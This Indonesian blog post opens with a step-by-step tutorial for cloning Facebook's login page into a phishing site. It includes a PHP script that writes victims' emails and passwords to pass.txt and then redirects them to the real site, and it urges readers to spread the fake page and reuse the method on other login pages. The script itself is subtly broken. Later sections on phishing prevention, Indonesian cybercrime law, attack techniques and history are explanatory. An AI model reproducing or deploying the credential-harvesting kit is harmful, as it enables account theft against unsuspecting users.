Cara membuat website phising

Mau Tahu caranya ?..... ini dia caranya :

1. Kita ambil contoh membuat Phising Facebook. pertama buka www.facebook.com/login.php.

2. Lalu Kalian Klik Kanan, pilih View Page Source, Seperti inilah Tampilan nya. (Google Chorme)

3. Setelah itu Copykan Semua Script ke Notepad.

4. Cari kode Kata action= untuk di ganti.

5. Ketika nanti Kalian klik Find pada Notepadnya, nanti kalian akan menemukan     action="https://login.facebook.com/login.php", Lalu, ubahlah menjadi action="secret.php" dan ubahlah juga methode dari "POST" Menjadi "GET" .

6. Lalu, Simpan file tersebut dengan nama index.php . Supaya menjadi File PHP bukan TXT, dalam kotak dialog save as type, ganti menjadi All Files.

7. Sekarang buat Notepad yang baru lagi. kemudian isiskan Script berikut ini :


<?php
header("location: http://www.facebook.com/login.php ");
$handler = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "_");
fwrite($handle, $value);
fwrite($handle, "\r\n");
{
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

8. Kemudian Simpan dengan nama file secret.php

9. Buka Notepad baru lagi. kemudian biarkan isinya kosong, dan simpan dengan nama pass.txt Fungsi file ini untuk menyimpan Email dan password facebook korban.

10. Terakhir Upload ketiga file tersebut (index.php , secret.php , dan pass.txt) ke dalam website hosting Sobat.

11. Sekarang kalian mempunyai halaman phising Facebook.

  Sekarang tugas sobat-sobat yaitu untuk menyebarkan Website palsu yang telah Sobat buat tadi supaya ada yang mengaksesnya. Cara phising seperti ini tidak akan merubah tampilan Login Facebook. Tampilan Facebooknya pastinya akan 100% sama seperti yang aslinya. ini contoh phising Facebook buatan ane.

    Nanti sewaktu ada seseorang yang membuka halaman facebook palsu yang telah kalian buat, password dan Email korban tersebut akan terkirim ke dalam file pass.txt yang telah kalian buat.

  Sobat juga dapat menerapkan cara yang sama untuk halaman-halaman yang menerapkan halaman login lainnya....

  From Bandung to S-W
  Kahfi Bee FT

Cara Mencegah aksi phishing

1. Cek Asal Usul Email
Modus yang biasa dilancarkan penjahat cyber adalah dengan mengirimkan email pancingan ke sejumlah orang. Isi surat elektronik tersebut biasanya meminta si calon korban untuk mengunjungi situs tertentu, untuk kemudian melakukan registrasi ulang (memasukkan username dan password e-banking nasabah).
Nah, bagi nasabah jangan lantas percaya jika mendapat email dengan model seperti ini. Cek dulu asal-usul si pengirim email, apakah menggunakan domain email resmi dari suatu bank tertentu atau tidak.  Sebab, jika mereka memakai domain email tak jelas, sudah tak usah dipercaya email tersebut. Meskipun di akhir email mereka mengaku-ngaku dari bank yang bersangkutan.

2. Tak Cukup Lewat Email
Melakukan registrasi ulang dengan memasukkan username dan password merupakan aktivitas yang sensitif. Jadi, penyampaian informasi terkait aktivitas ini juga tak bisa sembarangan, cuma lewat email. Sejumlah bank mengaku jika menginginkan para nasabahnya melakukan registrasi ulang, mereka biasanya tak cuma memberi kabar lewat email. Namun juga melalui sarana yang lebih personal, yakni dihubungi secara langsung. Ada juga yang menggunakan surat resmi, meski dipadu-padankan dengan email pula. Setidaknya, pihak bank memperlakukan aktivitas ini dengan lebih profesional.

3. Telepon Balik
Jangan ragu untuk menelpon customer service bank yang Anda gunakan. Lebih baik waspada, ketimbang ragu-ragu namun malah berujung hal buruk bagi Anda.

4. Membedakan Situs Asli atau Palsu
Situs lembaga keuangan yang digunakan untuk login biasanya memiliki sistem keamanan yang lebih ketat. Pertama, lihat alamat situsnya. Situs login harusnya menggunakan awalan ‘https‘ bukan ‘http‘. Https merupakan merupakan versi aman dari http.  Akhiran ‘s’ pada ‘http’ tersebut menandakan bahwa situs tersebut benar-benar telah ‘secure’, karena dilindungi oleh teknologi enkripsi data berupa Verisign SSL.

Di situs e-banking Bank Permata yang aspal, tercantum pula logo ‘Verisign Security Site’. Bagi orang awam, tentu sulit membedakannya. Yang dapat menjadi salah patokan kesahihan sebuah situs e-banking yaitu URL yang tertulis adalah ‘https’. Kemudian di bagian kanan bawah browser (untuk Firefox) ada gambar gembok yang terkunci. Sementara untuk Internet Explorer (IE), gembok warna kuning ini ada di isian URL
.

Jika korban tanpa sadar mengisi username dan password pada situs aspal tersebut, maka dapat dipastikan bahwa data-data personal tersebut, termasuk catatan aktifitas e-banking-nya, akan dapat diketahui oleh pihak lain yang tidak bertanggung jawab.

Undang Undang mengenai phising

 Ketentuan hukum yang mengatur tentang phising sampai saat ini belum ada, tetapi tidak berarti perbuatan tersebut dapat dibiarkan begitu saja. Perbuatan penipuan dengan modus Phising tetap dapat dijerat dengan berbagai peraturan yang ada, diantaranya UU Informasi dan Transaksi Elektronik (UU ITE) No. 11 Tahun 2008. Perbuatan penipuan tersebut memenuhi unsur pidana pasal 28 ayat 1, dan pasal 35. Berikut petikan isi pasal-pasal tersebut.

Pasal 28 ayat 1
Setiap Orang dengan sengaja dan tanpa hak menyebarkan berita bohong dan menyesatkan yang mengakibatkan kerugian konsumen dalam Transaksi Elektronik.

Pasal 35
Setiap Orang dengan sengaja dan tanpa hak atau melawan hukum melakukan manipulasi, penciptaan, perubahan, penghilangan, pengrusakan Informasi Elektronik dan/atau Dokumen Elektronik dengan tujuan agar Informasi Elektronik dan/atau Dokumen Elektronik tersebut dianggap seolah-olah data yang otentik.

Tindakan penipuan oleh pelaku phising jelas dilakukan dengan cara menyebarkan berita bohong dan menyesatkan sehingga konsumen (nasabah bank) menderita kerugian dalam transaksi elektronik perbankan. Dalam menjalankan aksinya, pelaku phising menciptakan informasi elektronik seperti mengirim pesan dalam bentuk e-mail ke para nasabah yang seolah-olah asli (otentik) dari bank yang resmi.

Bagi pelaku phising akan dikenai pidana penjara sesuai unsur pidana yang terpenuhi yang tercantum dalam pasal 45 ayat 2 untuk pasal 28 ayat 1, pasal 51 ayat 1 untuk pasal 35. Berikut petikan isi pasal tersebut.


Pasal 45 ayat 2

Setiap Orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 28 ayat (1) atau ayat (2) dipidana dengan pidana penjara paling lama 6 (enam) tahun dan/atau denda paling banyak Rp1.000.000.000,00 (satu miliar rupiah).


Pasal 51 ayat 1
Setiap Orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 35 dipidana dengan pidana penjara paling lama 12 (dua belas) tahun dan/atau denda paling banyak Rp12.000.000.000,00 (dua belas miliar rupiah).



Di Amerika sendiri Senator Leahy Partick J. memperkenalkan Undang-Undang Anti-Phishing tahun 2005 ke Kongres untuk dipertimbangkan. Undang-undang ini akan memungkinkan jaksa federal untuk mencari denda sampai $ 250.000 dan penjara hukuman hingga lima tahun
tercantum dalam sebuah blog yang memuat info tentang Hukum Phishing Amerika ..

Teknik kerja phishing

Ada bermacam-macam teknik kerja phishing, berikut adalah beberapa contohnya ..

Email / Spam

Phisher akan mengirim email yang sama ke jutaan pengguna, meminta mereka untuk mengisi informasi pribadi. Rincian ini akan digunakan oleh phisher untuk kegiatan ilegal mereka. Phising dengan email dan spam adalah Phising scam yang sangat umum.Sebagian besar pesan memiliki catatan yang mendesak yang mengharuskan pengguna untuk memasukkan kredensial untuk memperbarui informasi account, rincian perubahan, dan memverifikasi account. Kadang-kadang, mereka mungkin akan diminta untuk mengisi formulir untuk mengakses layanan baru melalui link yang disediakan dalam email.

Pengiriman Berbasis Web

Web berbasis pengiriman adalah salah satu teknik Phising yang paling canggih. Juga dikenal sebagai
“man-in-the-middle,” hacker terletak di antara situs web asli dan sistem Phising.







Phisher Jejak rincian selama transaksi antara situs yang sah dan pengguna. Sebagai pengguna terus menyampaikan informasi, itu dikumpulkan oleh phisher, tanpa pengguna mengetahui tentang hal itu.









Pesan Instan

Olah pesan cepat adalah metode di mana pengguna menerima pesan dengan link yang mengarahkan mereka ke situs web Phising palsu yang memiliki tampilan yang sama dan merasa sebagai situs yang sah.
Jika pengguna tidak melihat URL, mungkin sulit untuk membedakan antara situs palsu dan sah. Kemudian, pengguna diminta untuk memberikan informasi pribadi pada halaman.

Trojan Hosts

Trojan Hosts, hacker terlihat mencoba untuk login ke account pengguna Anda untuk mengumpulkan kredensial melalui mesin lokal. Informasi yang diperoleh kemudian dikirim ke phisher.

Manipulasi Tautan

Manipulasi link adalah teknik di mana phisher mengirimkan link ke sebuah website. Bila pengguna mengklik pada link menipu, itu membuka website phisher, bukan dari situs yang disebutkan di link.

Salah satu anti-Phising teknik yang digunakan untuk mencegah manipulasi link adalah untuk memindahkan mouse ke link untuk melihat alamat yang sebenarnya.









Key logger

Key logger mengacu pada malware yang digunakan untuk mengidentifikasi input dari keyboard. Informasi ini dikirim ke hacker yang akan memecahkan password dan jenis-jenis informasi.
Untuk mencegah Key logger dari mengakses informasi pribadi, situs web aman memberikan pilihan untuk menggunakan klik mouse untuk membuat entri melalui keyboard virtual.


Hacking

Dalam Session Hacking, phisher memanfaatkan sesi web mekanisme kontrol untuk mencuri informasi dari pengguna.
Dalam prosedur sesi sederhana hacker dikenal sebagai sesi mengendus, phisher dapat menggunakan sniffer untuk mencegat informasi yang relevan sehingga ia dapat mengakses server Web secara ilegal.

Sistem rekonfigurasi

Phisher akan mengirim pesan dimana pengguna diminta untuk mengkonfigurasi ulang setting dari komputer. Pesan tersebut mungkin berasal dari alamat web yang menyerupai sumber yang dapat dipercaya.


Konten Injeksi

Injeksi Konten adalah teknik di mana phisher mengubah bagian dari konten pada halaman situs diandalkan. Hal ini dilakukan untuk menyesatkan pengguna untuk pergi ke halaman luar situs yang sah di mana pengguna diminta untuk memasukkan informasi pribadi.

Phising melalui Search Engine

Beberapa penipuan Phising melibatkan mesin pencari mana pengguna akan diarahkan ke situs produk yang dapat menawarkan produk dengan biaya rendah atau jasa. Ketika pengguna mencoba untuk membeli produk dengan memasukkan rincian kartu kredit, itu dikumpulkan oleh situs Phising. Ada banyak situs bank palsu yang menawarkan kartu kredit atau pinjaman kepada pengguna pada tingkat yang rendah tetapi mereka sebenarnya situs Phising.

Phone Phising

Dalam Phone Phising, phisher membuat panggilan telepon ke pengguna dan meminta user untuk dial nomor.
Tujuannya adalah untuk mendapatkan informasi pribadi dari account bank melalui telepon. Telepon Phising banyak dilakukan dengan caller ID palsu.

Malware Phising

Penipuan Phising melibatkan malware memerlukannya untuk dijalankan pada komputer pengguna. Malware ini biasanya melekat pada email yang dikirimkan kepada pengguna oleh phisher.

Setelah Anda klik pada link, malware akan mulai berfungsi. Kadang-kadang, malware juga dapat disertakan pada file download.






Phisher mengambil keuntungan dari kerentanan keamanan web untuk mendapatkan informasi sensitif yang digunakan untuk tujuan penipuan. Ini adalah mengapa hal itu selalu ide yang baik untuk belajar tentang teknik Phising berbagai, termasuk Phising dengan Trojans dan Spyware.

Sejarah Phishing

Phising diperkenalkan pertama kali pada tahun 1995, dan menjadi masalah yang serius pada masa itu. Untuk menghindari menjadi korban phising, anda setidaknya harus mempunyai pemahaman dasar tentang phising. Dibawah ini merupakan sejarah phising untuk membuat anda sedikit mengerti tentang phising.

Nama Asal

email phishing / scams

Penipuan Phising menggunakan email palsu dan website sebagai umpan untuk mendorong orang untuk secara sukarela menyerahkan informasi sensitif. Tidaklah mengherankan, kemudian, bahwa “Phising” istilah umumnya digunakan untuk menggambarkan ploys. Ada juga alasan yang baik untuk penggunaan “ph” di tempat “f” dalam ejaan dari istilah tersebut. Beberapa hacker paling awal dikenal sebagai phreaks.Phreaking mengacu pada eksplorasi, eksperimen dan studi tentang sistem telekomunikasi. Phreaks dan hacker selalu terkait erat. The “ph” ejaan digunakan untuk menghubungkan penipuan Phising dengan komunitas-komunitas bawah tanah.


Direkam

Menurut catatan internet, pertama kalinya “Phising” adalah istilah digunakan dan tercatat adalah pada tanggal 2 Januari 1996. Menyebutkan itu terjadi di sebuah newsgroup Usenet disebut alt.online-service.america-online. Hal ini cocok bahwa itu dibuat di sana juga, America Online adalah tempat gemuruh pertama dari apa yang akan menjadi isu kriminal besar akan terjadi.

Phising di America Online

Kembali ketika America Online (AOL) adalah nomor satu penyedia akses Internet, jutaan orang login ke layanan ini setiap hari. Popularitasnya membuatnya menjadi pilihan utama untuk melakukan phising. Dari awal, hacker dan mereka yang memperdagangkan software bajakan menggunakan layanan ini untuk berkomunikasi dengan satu sama lain. Komunitas ini disebut sebagai masyarakat warez. Inilah masyarakat yang akhirnya membuat langkah pertama untuk melakukan serangan Phising.

Cara pertama yang dilakukan phisher adalah dengan menggunakan algoritma untuk membuat nomor kartu kredit secara acak. Jumlah kredit acak kartu yang digunakan untuk membuka rekening AOL. Akun tersebut kemudian digunakan untuk spam pengguna lain dan untuk berbagai hal lainnya. Program-program khusus seperti AOHell digunakan untuk menyederhanakan proses. Praktek ini diakhiri oleh AOL pada tahun 1995, ketika perusahaan membuat langkah-langkah keamanan untuk mencegah keberhasilan penggunaan angka kredit secara acak kartu.

Evolusi Phising

Dalam banyak hal, Phising tidak berubah banyak sejak masa kejayaan AOL nya. Pada tahun 2001, bagaimanapun, phisher mengalihkan perhatian mereka ke sistem pembayaran online. Meskipun serangan pertama, yang di E-Gold pada bulan Juni 2001, tidak dianggap berhasil, ditanam bibit penting. Pada akhir 2003, phisher terdaftar lusinan domain yang menunjukkan situs yang sah seperti eBay dan PayPal. Mereka menggunakan program worm email untuk mengirimkan email palsu kepada pelanggan PayPal. Mereka dipimpin pelanggan ke situs palsu dan diminta untuk memperbarui informasi kartu kredit mereka dan informasi identitas lainnya.

Phishing website banking 

Pada awal tahun 2004, phisher tumpangi gelombang besar keberhasilan yang mencakup serangan terhadap situs perbankan dan pelanggan mereka. Jendela popup digunakan untuk mendapatkan informasi sensitif dari korban. Sejak saat itu, banyak metode canggih lainnya telah dikembangkan. Mereka semua menggunakan konsep dasar yang sama, dan itu telahis terbukti cukup efektif.

Pengertian tentang Phishing

pengelabuan (Inggris: phishing) adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi peka, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang tepercaya dalam sebuah komunikasi elektronik resmi, seperti surat elektronik atau pesan instan. Istilah phishing dalam bahasa Inggris berasal dari kata fishing ('memancing'), dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna.

Dengan banyaknya kasus pengelabuan yang dilaporkan, metode tambahan atau perlindungan sangat dibutuhkan. Upaya-upaya itu termasuk pembuatan undang-undang, pelatihan pengguna, dan langkah-langkah teknis. (wikipedia - id)

Phishing adalah cara untuk mencoba mendapatkan informasi seperti username, password, dan rincian kartu kredit dengan menyamar sebagai entitas terpercaya dalam sebuah komunikasi elektronik. Komunikasi yang mengaku berasal dari populer situs web sosial, situs lelang, prosesor pembayaran online atau IT administrator biasanya digunakan untuk memikat publik tidak curiga. 

Phishing biasanya dilakukan melalui e-mail spoofing atau pesan instan, dan sering mengarahkan pengguna untuk memasukkan rincian di sebuah website palsu yang tampilan dan nuansa yang hampir sama dengan yang aslinya.
         
Phishing juga bisa di bilang contoh dari teknik rekayasa sosial yang digunakan untuk menipu pengguna dan memanfaatkan kegunaan miskin teknologi keamanan web saat ini. Upaya untuk menangani meningkatnya jumlah laporan insiden Phising termasuk legislasi, pelatihan pengguna, kesadaran masyarakat, dan keamanan teknis.

Sebuah teknik Phishing digambarkan secara rinci pada tahun 1987, dan penggunaan tercatat pertama dari “Phishing” istilah dibuat pada tahun 1996. Istilah ini adalah varian dari memancing, mungkin dipengaruhi oleh phreaking, dan menyinggung “umpan” yang digunakan dalam harapan bahwa calon korban akan “menggigit” dengan mengklik link berbahaya atau membuka lampiran berbahaya, dalam hal informasi keuangan dan password kemudian dapat dicuri.